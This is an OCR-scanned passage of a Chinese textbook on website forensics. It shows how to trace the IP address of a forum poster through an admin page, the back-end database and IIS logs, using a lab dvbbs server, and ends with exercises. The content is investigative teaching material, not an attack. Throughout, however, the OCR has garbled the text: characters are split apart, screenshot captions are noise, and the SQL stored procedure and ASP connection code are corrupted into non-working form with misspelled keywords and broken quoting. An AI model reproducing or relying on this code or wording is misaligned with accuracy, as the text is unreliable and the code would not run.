通过 了 解 1. 4 节 介 绍 的 网 站 后 台 架 构 内 容 , 无 论 哪 种 架构 方式 ,数据 库 服 务 器 都 不 会 
直接 面向 客户 端 ,而 是 面向 Web 服务 器 ,数据 库 在 运行 中 所 产生 的 日 志 只 能 够 记录 Web 
服务 器 的 信息 ,而 不 会 记载 客户 端的 特征 信息 ,所 以 ,数据 库 日 志 在 网 站 后 台 分 析 过 程 中 
不 予 考虑 。 

2) 追查 思路 

在 进行 特定 敏感 虚假 信息 追查 时 ,需要 从 以 上 相关 网 站 运行 痕迹 着 手 。 

(1) 从 网 站 界面 追查 。 

有 些 网 站 为 管理 员 提 供 了 浏览 发 帖 IP 地 址 信息 功能 ,因此 可 以 以 管理 员 身 份 登录 网 
站 ,进入 帖子 所 在 版 面 ,找到 敏感 虚假 帖子 ,查看 是 否 有 帖子 来 源 IP 地 址 信息 。 该 方法 最 
为 直接 ,而 且 操 作 简单 ,但 需要 一 定 的 前 提 条 件 ,如 网 站 管理 员 用 户 名 、 密 码 . 后 台 管 理 入 
口 ,最 重要 的 是 该 网 站 提供 了 此 功能 。 

(2) 从 数据 库 着 手 追 查 敏感 信息 。 

若 以 管理 员 身份 登录 系统 后 看 不 到 IP 地 址 信息 , 则 可 考虑 从 数据 库 表 中 查询 ,网 
站 系统 开发 人 员 在 进行 程序 设计 时 ,通常 在 数据 库存 储 帖子 内 容 的 同时 ,也 会 将 帖子 
相关 特征 如 发 帖 IP 地 址 等 信息 一 并 存储 。 根 据 数据 库 的 存储 结构 ,从 数据 库 着 手 追 查 
敏感 信息 ,应 遵循 “数据 库 服务 器 IP 地 址 一 数据 库 名 称 一 数据 库 表 名 称 一 特定 数据 ” 
规则 。 
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Q@ 定位 数据 库 服 务 器 IP 地 址 及 数据 库 名 称 。 

在 很 多 情况 下 数据 库 服务 器 与 网 站 服务 器 是 分 离 的 ,但 是 数据 经 过 网 站 服务 器 处 理 
后 最 终 是 存储 到 数据 库 服务 器 中 的 ,也 就 是 说 前 台 网 站 服务 器 与 后 台数 据 库 服 务 器 是 连 
接 的 。 通 过 已 经 定位 到 的 网 站 服务 器 内 Web 服务 器 软件 设置 ,可 找到 网 站 源 代码 ,将 
2. 3. 2 节 讲 解 的 ASP 网 站 前 后 台 的 连接 模式 归纳 为 两 类 : 一 类 是 通过 连接 配置 文件 ; 另 
一 类 是 通过 本 机 的 DSN 设置 连接 数据 库 的 。 在 网 站 分 析 时 ,首先 在 网 站 源码 目录 内 查找 
配置 文件 ,根据 程序 员 编 程 习惯 ,配置 文件 通常 命名 为 conn. asp database .db .connection 
等 ,可 能 位 于 include .inc 及 connection 子 文件 夹 内 或 直接 在 源码 根 目 录 下 。 找 到 相关 配 
置 文件 后 ,会 有 数据 库 服务 器 IP 地 址 及 数据 库 名 称 , 若 出 现 DSN 字样 , 则 可 以 通过 “ 开 
始 " 一 “管理 工具 ”一 “数据 源 (ODBC) ”命令 ,打开 *ODBC 数据 源 管理 器 ”窗口 ,找到 相应 
DSN, 点 击 相 应 “配置 "命令 ,打开 “DNS 配置 ?对 话 框 , 即 可 找到 数据 库 IP 地 址 及 数据 库 
名 称 。 

@ 定位 数据 表 。 根 据 系统 需要 ,程序 员 可 能 在 后 台数 据 库 中 定义 许多 数据 表 , 怎 么 
样 才能 定位 到 存 有 敏感 信息 的 数据 表 呢 ? 

有 一 些 常规 方法 可 以 使 用 ,如 果 能 够 找到 相关 程序 开发 人 员 , 可 直接 询问 ;或 如 果 事 
先知 道 管 理 员 身份 信息 ,可 登录 网 站 管理 后 台 ,查找 是 否 有 设置 数据 库 表 的 选项 信息 ; 若 
本 人 具有 一 定 的 编程 基础 ,也 可 以 从 网 站 源码 进行 分 析 , 通 过 其 中 数据 库 操作 代码 ,找到 
最 终 存放 敏感 信息 的 数据 表 ; 也 可 以 对 后 台数 据 中 的 所 有 表 进 行 逐 一 猜测 ,这 是 效率 最 低 
的 办 法 ;还 有 一 种 快捷 方法 就 是 利用 SQL 语句 编写 一 个 全 库 搜索 过 程 ,完成 数据 库 内 所 
有 表 的 遍历 查找 ,只 要 在 数据 服务 器 上 执行 该 存储 过 程 , 输 入 敏感 信息 参数 , 即 可 定位 到 
存 有 敏感 信息 的 数据 表 。 

@ 构建 SQL 语句 在 特定 数据 表 内 进行 查询 。 

定位 到 数据 表 后 ,可 根据 已 知 发 帖 时 间 , 发 帖 敏感 信息 等 特征 信息 构建 SQL 语句 查 
询 在 数据 表 内 过 滤 数 据 , 如 : “select * from bbs where ([cs-uri-stem] 二 /post. asp)and 
([date]='2011-09-06" and ([time]>>='14:10:01'and [time]=<='14:10;30")”,。 

(3) 从 IIS 日 志 着 手 分 析 。 

如 果 在 网 站 界面 和 数据 库 中 都 找 不 到 IP 地 址 信息 ,可 以 从 IIS 日 志 着 手 , 分 析 找 到 
可 疑 IP 地 址 信息 。 通 过 IIS 日 志 分 析 具 体 步 又 如 下 : 

中 确定 IIS 日 志 位 置 , 具 体 步 又 参见 2. 3. 1 节 。 

@ 利用 专业 工具 或 将 日 志文 件 导 和 人 到 数据 库 中 ,具体 步 又 参见 2.3. 1 节 。 

@ 根据 已 知 发 帖 时 间 和 发 帖 所 访问 的 页 面 等 特征 信息 构建 SQL 语句 ,过 滤 日 志 
数据 。 


3. 实例 分 析 
【 实 训 2-9】 虚拟 机 Windows 2003 Server 作为 网 站 服务 器 ,已 经 通过 IIS 发 布 了 “ 动 
网 论坛 ”, 其 IP 地 址 为 192. 168. 157. 128 ,端口 为 默认 端口 80 ,客户 机 与 虚拟 机 的 联网 方 
式 为 host-only,IP 地 址 为 192. 168. 6.1。 通 过 客户 端 访 问 “ 动 网 论坛 ”, 在 “最 新 信息 ”中 
的 “时 事 新 闻 ” 论 坛 里 看 到 虚假 信息 如 图 2-86 所 示 。 下 面 分 析 发 布 该 虚假 信息 可 疑 计算 
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机 的 IP 地 址 信息 。 


登录 | 注册 | 搜索 ;风格 论坛 状态 论坛 展区 | 我 能 做 什么 
> 时 事 新 闻 


日 动 网 先锋 论坛 ~ 最 新 信息 一 时 事 新 闻 一 沈阳 今 易 有 七 级 大 风 
你 发表 话 是 | 肛 发 起 投标 | 全 回帖 也 | [下 订阅 主 归 | 


场 主 局 和 订阅 _ 侈 短信 全 悄悄 话 全 好 友 间 信 息 辐 搜索 合 邮 箱 名 引用 疾 加 和 
多 区 沈阳 今 哆 有 七 级 大 风 * 

i 据 可 * 消 息 ， 沈阳 今 驳 有 七 级 大 风 t 大 家 址 索 做 好 准备 移 4 

文章 :1 


积分 : 212 
注册 : 2011-10-17 


等 鲜 花 加 ) ,总 鸡蛋 人 D) 


盟 2011-10-17 10:17:00 
本 主题 贴 数 1 分 页 : 网 1 几 


手机 短信 


图 2-86 动 网 论坛 中 虚假 信息 
1) 从 网 站 界面 追查 


假设 已 知 网 站 管理 员 的 用 户 名 及 密码 分 别 是 admin 和 admin888, 以 管理 员 身份 登录 
网 站 ,进入 “最 新 信息 ”中 的 “时 事 新 闻 ” 版 面 ,找到 虚假 信息 所 在 版 面 。 单 击发 帖 时 间 旁 边 


的 计算 机 图 标 ,弹出 查看 用 户 IP 地 址 信息 页 面 , 即 可 找到 发 帖 计算 机 IP 地 址 为 192. 
168. 157. 3, 如 图 2-87 所 示 。 


手机 图 片 铃声 下 载 | 自 写 短信 | 阳光 客服 | 
2vess OO ai a 


adein 重 登 录 | 隐身 | 用 户 控制 面板 | 手机 短信 | 搜索 | 风格 | 论坛 状态 | 论坛 展区 i 管理 | 回收 站 | 退出 
>> 时 事 新 闻 


全 我 的 收 件 箱 00) 
日 动 网 先锋 论坛 ~ 浏览 个 人 资料 一 查看 用 户 IP 信 息 


查看 192. 168. 157. 3 的 来 源 


荷兰 


管理 操作 : 限制 该 IP 不 允许 访问 


图 2-87 “查看 用 户 IP 信息 "页面 
2) 从 数据 库 着 手 追 查 


如 果 网 站 没有 设计 实现 查看 发 帖 者 IP 地 址 信息 功能 ,或 调查 人 员 无 法 得 到 网 站 管理 
员 月 


目 户 名 及 密码 ,没有 权限 看 到 发 帖 者 IP 地 址 信息 的 话 ,可 以 从 网 站 后 台数 据 库 着 手 调 
查 发 帖 者 IP 地 址 信息 ,具体 步骤 如 下 : 
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(1) 定位 数据 库 IP、 数 据 库 名 称 。 
从 Web 程序 的 前 后 台 连 接 模式 考虑 , 动 网 论坛 的 数据 库 连 接 方式 为 使 用 OLEDB 方 


式 , 它 将 连接 参数 放 到 了 源码 主 目录 下 的 conn. asp 文件 中 ,其 关键 代码 如 下 : 


“定义 数据 库 类 别 ,1 为 SQL 数据库,0 为 Access 数据 库 
Const lsSqlDataBase= 1 
If lsSqlDataBase= 1 Then 
“sql 数据 库 连 接 参 数 : 数据 库 名 、 用 户 密码 、 用 户 名 、 连 接 名 (本 地 用 local, 外 地 用 IP) 
Dim SqlDatabaseName, SqlPassword, SqlUsername, SqlLocalName 
SqlDatabaseName= “dvbbsdb” 
SqlPassword= “ 
SqlUsername= “sa” 
SqlLocalName= “(local)” 
ComnStr= “Provider= Sqloledb; User ID=” & SqlUsername & ”; 
Password=” & SqlPassword & ”; Initial Catalog= ”& SqlDatabaseName & ”; 
Data Source=” & SqlLocalName & ”;” 
Else 
“免费 用 户 第 一 次 使 用 请 修改 本 处 数据 库 地 址 并 相应 修改 data 目录 中 数据 库 名 称 ,如 将 
Db= “data/dvbbs7. mdb” 
CorrStr= “Provider= Microsoft. Jet QLEDB. 4 0;Data Source= ” & Server. NepPath cb) 
End If 


对 以 上 代码 进行 分 析 可 以 看 出 ,数据 库 服务 器 的 IP 地 址 为 变量 SqlLocalName 的 值 


值 local, 表示 数据 服务 器 和 网 站 服务 器 是 同一 台 计 算 机 ,数据 库 名 称 为 变量 
SqlDatabaseName 的 值 即 dvbbsdb; 连 接 该 数据 库 的 用 户 为 sa, 密 码 为 空 。 


(2) 定位 数据 表 。 
首先 在 所 找到 的 后 台数 据 库 内 创建 存储 过 程 SP_FindValueInDB。 具 体 过 程 为 : 在 


SQL Server Enterprise Manager 窗口 选择 “工具 ”一 “查询 分 析 器 "命令 打开 “SQL 查询 分 
析 器 ”窗口 ,数据 库 选择 dvbbsdb, “查询 ”窗口 内 输入 以 下 代码 : 
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CREATE PROCEDURE [dbo]. [SP_FindvaluelnDB] 
( 
@ value VARCHAR (1024) 


BEGIN 
一 -SET NOCOUNT ON added to prevent extra result sets from 
—— interfering with SELECT statements. 

SET NOCOUNT ON; 

DECLARE @ sql VARCHAR(1024) 

DECLARE @ table VARCHAR (64) 

DECLARE @ colum VARCHAR (64) 

CREATE TABLE #t ( 
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tablename VARCHAR (64) , 
columname VARCHAR (64) 
) 
DECLARE TABLES CURSOR 
FOR 
SELECT o. name，c.name 
FROM syscolums c 
INNER JOIN sysobjects o ON c. ido. id 
WHERE o.type= 'U AND c. xtype IN (167, 175, 231, 239) 
ORDER BY o. name，c. name 
OPEN TABLES 
FETOH NEXT FROM TABLES 
INTO @ table, @ colum 
WHILE @ @ FETOH_STATUS= 0 
BEGIN 
SET @ sql= 'IF EXISTS (SELECT NULL FROM [+@ tablet '] 
SET @ sql= @ sql+ "WHERE RTRIM(LTRIM([ + @ columr '])) LIKE …% "+@valuer '%"") 
SET @ sql=@ sql+ "INSERT INTO#t VALUES (+@tabler 
SET @ sql=@ sql+ @ colum+ "*')" 
EXEC (@ sql) 
FETOH NEXT FROM TABLES 
INTO @ table, @ colum 


选择 “查询 ”>“ 执 行 "命令 , 即 在 dvbbsdb 数据 库 内 创建 了 存储 过 程 SP_FindValueInDB; 
然后 ,在 后 台数 据 库 dvbbsdb 内 调用 此 存储 过 程 查询 包含 关键 词 的 数据 表 , 调 用 代码 如 下 : 


EXEC [SP_FindValuelnD8] “沈阳 今 晚 有 七 级 大 风 ' 


执行 结果 如 图 2-88 所 示 。 

该 存储 过 程 将 所 有 含有 “沈阳 今 晚 有 七 级 大 风 ” 关 键 词 的 数据 表 及 字段 都 已 显示 ,对 
这 些 数据 表 逐 一 进行 检查 ,发 现 这 些 数据 表 中 只 有 Dv_bbsl 数据 表 在 存储 帖子 标题 的 同 
时 也 存储 了 IP 地 址 信息 ,如 图 2-89 所 示 。 

(3) 从 数据 表 中 过 滤 出 特定 数据 。 

通常 来 说 ,网 站 后 台 保 存 帖子 信息 的 数据 表 中 会 有 很 多 数据 ,调查 人 员 可 以 根据 帖子 
标题 内 容 及 发 帖 时 间 等 关键 信息 构建 SQL 语句 来 进行 数据 过 滤 , 如 构建 SQL 语句 
“select *x from Dv_bbsl where Topic= "沈阳 今 晚 有 七 级 大 风 ! "进行 查询 ,结果 如 图 2-90 
所 示 , 从 而 定位 发 帖 计算 机 IP 地 址 为 ip 字段 值 192. 168. 157. 3 。 
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二 ,SQL 查询 分 析 器 


文件 外 编辑 于) 查询 @) 工具 CI) 窗口 史 帮助 中 


| x 


ET x| 


目 ccPc-T9zH3UESRI (CCF -| 


目 ccPc-T97ZR3UESRI 


| 首 - 蕊 国 辐 |% 宇 尼 思 息 | 器 | 国 -|V》a||0 ws 可 | 可 [管区 | 本 国 


由 -器 arbbsab 
由- 口 naster 
由 - 品 medaal 
-Unsdb 
由 . 口 Northwind 
由 - 口 pabs Dw_bbsl Topic 
由 口 shop Dv_Board LastPost 
由 口 top Dw_Setup Forun LastPost 
口 公用 对 象 De 
2 -Topic LastPost 
由 -器 配置 函数 Do Tt 
由 器 游标 函数 yv_Topic Title 
田口 日 和 时 间 函 数 
田口 数学 函数 
图 -站 聚合 函数 -TgZR3VESRI (8.0) 


-TIZR3UESRI\Administra dvbbsdb | 0:00:00 5 行 


1: 列 36 


图 2-88 ”全 库 搜索 结果 


WE 中 的 煞 据 。 位 置 是 “dvbbsdb” 中 、 


“0Qecal)” 上 


Sri LE 2011-10-17 8:39 32 
沈阳 今 晚 有 七 级 大 据 可 靠 消 息 , 沈阳 < 2011-10-17 10:1 52 
新 玛 特 打折 啦 b 。 新 玛 特 打折 啦 ? 新 1 2012-2-13 22:27 42 


1 0 0 192.168.157.1 facel. gif 
1 0 0 192.168.157.3 facel. gif 
1 0 0 192.188.157.3 facel. gif 


图 2-89 Dv_bl 


WE 中 的 数据 ,位 置 是 “dvbbsab” 中 


bsl 数据 表 


ml 


UserName [postulTopic [Boay [DateAndTine esl1ay[or[istip [Expression 
场 主 4 沈阳 今 晚 有 七 级 大 风 ? 。 据 可 靠 消息 ， 沈 阳 今 晚 2011-10-17 10:17:00 52 1 0 0 192.168.157.3 facel, gif 
| 到 
[ | 也 
图 2-90 ”Dv_bbsl 数据 表 内 过 滤 结 果 
3) 从 IIS 日 志 着 手 分 析 
习 
如 果 调 查 人 员 既 无 法 得 到 网 站 后 台数 mm 让 | 
据 库 ,也 没有 管理 员 权 限 能 够 通过 网 站 界 新 日 志 计 划 
面 查 出 发 帖 者 IP 地 址 信息 ,那么 可 以 从 网 人 
站 的 IIS 日 志 中 分 析 找到 可 疑 的 发 帖 者 IP hs 
地 址 信息 ,具体 步 又 如 下 : CO 
(1) 定位 日 志文 件 。 3 
在 “Internet 信息 服务 器 管理 器 * 中 打 和 
开 “dvbbs 属性 "对话 框 中 ,看 到 活动 日 志 日 志文 件 目录 中: 


格式 为 “W3C 扩展 日 志文 件 格式 ”, 单 击 
“属性 ”按钮 ,打开 “日 志 记 录 属 性 ”对 话 框 
如 图 2-91 所 示 。 可 见 日 志文 件 目 录 为 C:\ 
WINDOWS\system32\LogFiles, 文 件 名 格 
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F WINDOWS\system32\LogFiles 浏览 @@)... 


日 志文 件 名 : WISYCT22942227\exyymmdd. log 


取消 丙 逢 厅 屠 助 


图 2-91 “日 志 记录 属性 窗口 
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式 为 W3SVC72294222\exyymmdd. log。 

需要 注意 的 是 ,文件 名 最 后 6 位 为 年 月 日 ,根据 所 要 追查 帖子 的 发 表 日 期 2011-10-17 
可 知 , 完 整 日 志文 件 路 径 为 C:\WINDOWS\system32\LogFiles\ W3SVC72294222\ 
exl11017. log。 

(2) 将 日 志文 件 导 入 到 数据 库 中 ,生成 ex111017 数据 表 。 具 体操 作 步 又 见 2. 3. 1 节 。 

(3) 根据 事件 已 知 条 件 , 发 帖 时 间 为 *2011-10-17 10:17:00” 及 发 帖 所 访问 的 页 面 为 
“/post. asp? action 一 new&-boardid 王 5”, 并 且 考 虑 到 日 志 所 记载 的 时 间 GMT 时 间 ( 即 格 
林 尼 治标 准时 间 ) 比 中 国 北京 时 间 慢 8 小 时 ,构建 SQL 语句 "select * from exl11017 


where ([cs-uri-stem |="/post. asp') and ([ date|='2011-10-17') and ([time|>='02.;15: 


30) and ([time] <='02:17:00'" and ([cs-uri-query] 一 action 一 new&boardid 王 50”。 执 


行 结果 如 图 2-92 所 示 ,发 帖 者 所 使 用 计算 机 的 IP 地 址 为 c-ip 字段 值 192. 168. 157.: 


间 表 “exl111017” 中 的 数据 ， 位 置 是 “<Log” 中 、“(local)” 上 


me exl11017 
RE ([es-uri-stem] = /post. asp’ ) AND ([date] = “2011-10-17’) AND ([time] % "02:15:30 ’) 
AND ([time] < “02:17:00 *) ANWD ([cs-uri-query] = ’ action=newaboardid=5’ ) 


ate [tine [si [es-method [cs-uri-sten|cs-uri-quer; [ci Le: 
2011-10-17 02:15:46 192. 168. 157. 128 GET /post.asp action=newgboardid-5 192.166.157. 3 Ml 


> 


图 2-92 exl11017 内 日 志 过 滤 结 果 


(4) 同样 可 构建 SQL 语句 利用 Log Parser 工具 对 IIS 日 志 进 行 分 析 , 结 果 如 图 2-93 
所 示 ,发 帖 者 所 使 用 计算 机 的 IP 地 址 为 c-ip 字段 值 192. 168. 157. 3 。 


and timestamp 
and cs-uri-query=’action 


c-ip cs-uri-s 


Po11-16-17 92:15:46 192.168.157.3 /post.as 


图 2-93 ”Log Parser 分 析 日 志 结 果 


254 网 站 分 析 中 常见 问题 

本 节 对 调查 人 员 在 网 站 服务 器 分 析 过 程 中 遇 到 的 问题 逐一 进行 说 明 。 

1. 确定 一 台 主 机 为 网 站 服务 器 

Web 服务 所 对 应 的 默认 开放 端口 为 80 号 ,网 站 服务 器 的 最 主要 特征 就 是 计算 机 正 
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在 监听 80 号 端口 ,表明 该 机 器 正在 运行 Web 应 用 服务 , 即 为 网 站 服务 器 。 那 么 如 何 判断 
计算 机 正在 监听 哪些 端口 呢 ? 如 果 是 Windows 操作 系统 , 则 选择 “开始 ”一 “程序 ”一 “ 附 
件 ” 一 “命令 提示 符 ” 命 令 , 打 开 cmd 命令 窗口 ,在 该 窗口 内 输入 “netstat -an” 命 令 , 结 果 即 
可 见 计算 机 正 开放 监听 哪些 端口 ;如 果 是 Linux 操作 系统 , 则 在 命令 终端 中 输入 “netstat - 
tnl” 命 令 来 查看 。 


2 开机 状态 下 确认 一 个 网 站 服务 器 发 布 了 哪些 网 站 
一 个 网 站 服务 器 可 同时 发 布 运行 多 个 网 站 ,选择 “开始 ”所 有 程序 ”一 "管理 工具 ”一 
“Internet 信息 服务 (IIS) 管 理 器 ”命令 ,弹出 “Internet 信息 服务 管理 器 窗口。 在 “网 站 ” 
子 菜单 下 可 见 该 网 站 服务 器 上 发 布 的 网 站 名 称 如 图 2-94 所 示 。 该 服务 器 上 同时 发 布 了 
dvbbs.qq、shop、WW 共 4 个 网 站 ,其 中 dvbbs 和 qq 为 运行 状态 ,shop 和 WW 为 停止 
状态 。 


ri 操作 查看 WW) 窗口 Q) 帮助 0 和 陋 5 
中 小 | 旬 | 四 | XX 办 加 加 | 岛 | 旦 | 》 | 


Internet 信息 服务 
日 勋 ccFc-T9ZR3UESRI (本 地 计算 机 ) 
加 应 用 程序 池 

网 站 


Da 
BD aspnet_client 
六 Dats 

DD Datapackup 


图 2-94 ”Internet 信息 服务 (IIS) 管 理 器 


3. 快速 定位 网 站 的 源码 文件 所 在 位 置 

调查 人 员 只 需 在 IIS 管理 器 界面 中 选择 所 要 查看 的 网 站 ,如 dvbbs, 右 击 , 在 弹出 的 快 
捷 菜 单 中 选择 “属性 "命令 ,将 打开 “dvbbs 属性 ”对 话 框 。 切 换 到 主 目录 选项 卡 ,如 图 2-95 
所 示 。 可 见 该 网 站 的 源码 文件 在 c:\website 文件 夹 中 。 


4. 快速 定位 网 站 的 访问 日 志文 件 所 在 位 置 

调查 人 员 只 需 在 IIS 管理 器 界面 中 选择 所 要 查看 的 网 站 ,如 dvbbs , 右 击 , 在 弹出 的 快 
捷 菜单 中 选择 “属性 ”命令 ,将 打开 “dvbbs 属性 ”对 话 框 。 在 网 站 属性 默认 的 “网 站 ”选项 
卡 中 单 击 “ 活 动 日 志 格 式 ” 对 应 的 “属性 ”按钮 ,打开 “日 志 记 录 属 性 ”如 图 2-96 所 示 的 对 话 
框 。 具 体 含义 解析 参见 2. 5. 1 节 

5. 定位 虚拟 目录 的 实际 指向 位 置 

在 案件 现场 调查 过 程 中 ,发 现 某 计 算 机 中 的 IIS 内 发 布 了 WEB]1 网 站 ,在 WEBI] 网 
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EE 
目录 安全 性 1 TIP 头 1 自 定 义 错 误 | 
网 站 | 性 能 | 。 IShAPI 争先 器 主 上 录 | 文 粕 ”| 
此 资源 的 内 容 来 自 
分 此 计算 机 上 的 目录 四) 
个 另 一 台 计算 机 上 的 共享 @) 
个 重 定向 到 VRL 
本 地 路 径 @): [website 浏览) 
厂 脚本 资源 访问 I) 克 记录 访问 
到 读 职 邓 ) 末 索引 资源 加 ) 
厂 写 大 名 
厂 目录 浏览 @) 
应 用 程序 设置 
应 用 程序 名 加 ) 区 VER 和 
开始 位 置 : dvbbs> 
配置 @) 
执行 权限 下) 局 FE 
应 用 程序 池 0 : DefaultAppPool 半 堪 全 ) 
取消 应 用 () 天助 
图 2-95 “dvbbs 属性 ”窗口 
| 
常规 | 高 级 | 
新 日 志 计 划 
个 每 人 0 
天] 
斑 每 周 中 ) 
三 每 月 中) 
个 不 限制 文件 大 小 
个 当 文 件 大 小 达到 G) : 
| 加 司 We 
厂 文件 命名 和 创建 使 用 当地 时 间 CD) 
日 志文 件 目录 QU): 
FE \WINDOWS\system32\LogFiles 训 览 @)，， | 
日 志文 件 名 : WISYCT22942227\exyymmdd. log 


取消 ”| 万 用 多 者 助 | 
图 2-96 “日 志 记 录 属 性 ”窗口 


站 属性 窗口 中 发 现 该 网 站 主 目录 为 C:\Shop, 如 图 2-97 所 示 ,那么 ,是 否 就 能 够 断定 所 调 
查 网 站 的 全 部 源 文件 均 位 于 网 站 服务 器 的 主 目录 C:\Shop 文件 夹 内 呢 ? 

这 里 不 能 简单 认为 WEB1 网 站 的 源码 文件 全 部 存放 在 服务 器 的 C:\Shop 文件 夹 内 ， 
因为 网 站 目录 下 含有 虚拟 目录 image. 虚 拟 目 录 所 连接 内 容 通常 不 在 主 目录 内 ,指向 另外 
一 个 磁盘 驱动 器 ,甚至 是 另外 一 台 计 算 机 内 的 某 个 目录 。 要 想 完整 地 定位 网 站 源码 文件 ， 
需要 查看 网 站 内 部 的 所 有 虚拟 目录 的 实际 指向 位 置 . 如 图 2-98 所 示 。 可 见 该 虚拟 目录 属 
性 的 实际 指向 位 置 为 \\192. 168. 157. 1\webshopl ,也 就 是 说 WEB1 网 站 的 源码 文件 除了 
在 网 站 服务 器 的 C:\Shop 文件 夹 外 ,还 包括 IP 地 址 为 192. 168. 157. 1 的 主机 上 共享 文 
件 夹 webshopl 中 的 内 容 。 
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站 [BE [RE 
EE 
目录 安全 性 1 JITP 头 | 自 定义 错误 | 
网 站 | 性 能 | IshrI 第 先 器 主 目录 四 文档 
自 : 
应 用 程序 池 加- Defaul tAppPool 列 吉 加 ) 
| CE | 了 首 下 用 天助 
司 -ore sm 


图 2-97 ”Internet 信息 服务 (IIS) 管 理 器 一 一 WEB1 主 目录 


EE 42x 
虚拟 目录 | 文档 [lr ll 
此 资源 的 内 容 来 自 


网 络 目录 避 ) \\192. 168. 157. 1\webshopl 连接 为 @). | 
厂 脚本 资源 访问 I) 伙 记录 访问 Q) 
你 读 取 @@) F 索引 资源 上 ) 
厂 写 入 @) 
厂 目录 浏览 B) 
应 用 程序 设置 
应 用 程序 名 仙 ); jimage 山 除 到 ) | 
开始 位 置 《dvbbs>Aimage 

配置 @) 
执行 权限 中); 纯 肢 本 -| | 
应 用 程序 池 四) ; DefaultAppPool | 逆 塌 加) | 


取消 | 应用) | 帮助 | 
图 2-98 image 虚拟 目录 属性 


6. Metabasexm 文件 解析 


假设 某 送 检 单 位 送 来 一 块 网 站 服务 器 硬盘 ,要求 从 检 材 中 找到 与 案件 相关 的 网 站 文 


件 , 但 该 硬盘 的 操作 系统 部 分 文件 损坏 ,系统 不 能 正常 启动 ,如 何 进行 查找 呢 ? 


解析 : 在 取证 机 上 对 检 材 克隆 复 件 进行 操作 ,根据 操作 文件 特征 确定 为 Windows 操 
作 系 统 后 ,可 在 系统 分 区 中 搜索 Metabase. xml 文件 ,该 文件 默认 目录 为 C:\WINDOWS\ 


system32Ninetsrv, 从 中 可 找到 相关 网 站 发 布 信息 。 
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其 中 ,Metabase. xml 文件 称 为 元 数据 库 配置 文件 ,存储 了 IIS 的 所 有 配置 信息 ,包括 
网 站 的 发 布 配置 信息 。 当 启动 IIS 或 重启 IS 时 ,相应 进程 会 读 取 Metabase. xml 文件 内 
容 放 入 IIS 缓存 中 ,在 IIS 配置 管理 窗口 中 显示 出 相关 信息 。Metabase. xml 文件 内 容 非 
常 多 ,为 了 快速 定位 服务 器 内 的 网 站 发 布 信息 ,可 遵循 以 下 步 又， 

(1) 在 文件 中 搜索 IIsSWebServer 标签 ,该 标签 记载 了 网 站 的 描述 .标识 (IP 地 址 、 端 
口号 ,主机 头 ) .日志 目 录 等 重要 信息 。 

(2) 根据 IIsWebServer 标签 中 Location 属性 值 在 文件 中 搜索 与 其 对 应 的 
IIsWebVirtualDir 标签 ,其 中 包含 网 站 主 目录 及 虚拟 目录 的 路 径 信息 。 例 如 ,Location 属 
性 值 为 /LM/W3SVC/90346, 则 /LM/W3SVC/90346/ROOT 为 主 目录 ,/LM/W3SVC/ 
90346/ROOT/images 表示 主 目录 下 的 images 虚拟 目录 。 

(3) 根据 IIsWebVirtualDir 标签 中 的 path 属性 得 到 网 站 的 主 目录 或 虚拟 目录 的 实 
际 指向 位 置 。 

假设 在 检 材 中 发 现 Metabase. xml 文件 ,并且 搜索 到 IIsWebServer 标签 ,部 分 内 容 如 
图 2-99 所 示 。 


《IIsWebServer Location ="/LWW3SYC/722942227" 
AuthFlags="0" 
LogFileDirectory="C:\LOGS” 
LogFileLocaltimeRollover="FALSE” 
LogFilePeriod="1” 
LogFileTruncateSize=" 20971520” 
LogPluginClsid=" {FF160663-DE82-11CF-BCOA-00AA006111E0}" 
ServerAutoStart=" TRUE” 
ServerBindings=" 192. 168. 157. 128: 80: dvbbs. ccpc. edu. cn” 
ServerComent=" dvbbs” 
bp 
/IIsWebServer> 
《IIsWebVirtualDir Locat ion ="/LJWW3SVCVT22942227T/root” 
AccessFlags="AccessRead | AccessScript 
AppFriendlyName=" 默 认 应 用 程序 
AppIsolated="2" 
AppRoot="/LIV/W3SYC/722942227/Root” 
AspEnableParentPaths=" TRUE” 
AuthFlags=" Authinonymous | AuthNTLIC 
DefaultDoc=" index. asp, Default. htm, Default. asp, index. htm, Default. aspx” 
DirBrowseFlags="DirBrowseShowDate | DirBrowseShowTime | DirBrowseShowSize | DirBrowseShowExtension 
Path="C: \website\DVBBS7. 0SP2MSSQL” 
ScriptNaps=", asa, C: \WINDOWS\system32\inetsrv\asp. dl11, 5, GET, HEAD, POST, TRACE” 
> 
</IIsWebVirtualDir> 
《IIsWebVirtualDir Locat ion ="/LJVW3SVCVT2294222TVrootyimage” 
AccessFlags="AccessRead | AccessScript” 
AppFriendlyName=" image” 
AppIsolated="2" 
AppRoot=" /LWW3SYC/ T22942227/Root/image” 
DirBrowseFlags="DirBrowseShowDate | DirBrowseShowTime | DirBrowseShowSize | DirBrowseShowExtension 
Path="\\192. 168. 157. 1\webshopl” 


图 2-99 ”Metabase. xml 文件 部 分 内 容 


经 解析 发 现 : 
Q@ IIsWebServer 标签 中 的 ServerBindings 属性 值 为 网 站 标识 , 即 网 站 的 IP 地 址 为 
192. 168. 157. 128 ,端口 为 80 ,域名 为 dvbbs. ccpc. edu. cn。 
@ IISWebServer 标签 中 的 LogFileDirectory 属性 值 为 网 站 访问 日 志 目 录 , 即 C:\ 
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LOGS, 


@@ IIsWebServer 标签 中 的 Location 属性 值 为 722942227, 接 下 来 以 它 为 关键 字 在 
Metabase. xml 文件 中 搜索 ,找到 两 个 IsWebVirtualDir 见 图 2-99。 其 中 ,一 个 
IisWebVirtualDir 标签 的 Location 属性 值 为 /LM/W3SVC/722942227/root, 表 明 该 标签 
包含 网 站 主 目录 配置 信息 ,标签 内 Path 属性 值 为 C:\website\DVBBS7. 0SP2MSSQL, 即 
为 网 站 主 目 录 ; 另 一 个 IisWebVirtualDir 标签 的 Location 属性 值 为 /LM/W3SVC/ 
722942227/root/image, 表 明 该 标签 包含 网 站 image 虚拟 目录 配置 信息 ,标签 内 Path 属 


性 值 为 \\192. 168. 157. 1\webshopl , 即 为 image 虚拟 目录 的 实际 指向 位 置 。 
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习 题 2 


1. 选择 题 ( 可 多 选 ) 
(1) 常见 的 网 页 文件 扩展 名 为 ( » 


A. asp B. html C088 D. js 
(2) 下 列 ( ) 脚 本 是 来 描述 网 页 内 容 的 ,并 且 由 浏览 器 解释 执行 的 。 
A. ASP B，HTML C. CSS D. JS 
(3) HTML 文档 包含 的 两 个 部 分 是 指 (  )。 

A. 文档 头 部 B. 标题 C. 注释 D. 文档 主体 
(4) 下 面 ( ) 脚 本 能 实现 客户 端 动态 效果 。 

A. VBScript B. HTML C. JavaScript D. CSS 
(5) 下 面 ( ) 脚 本 能 实现 服务 端 动 态 效 果 。 

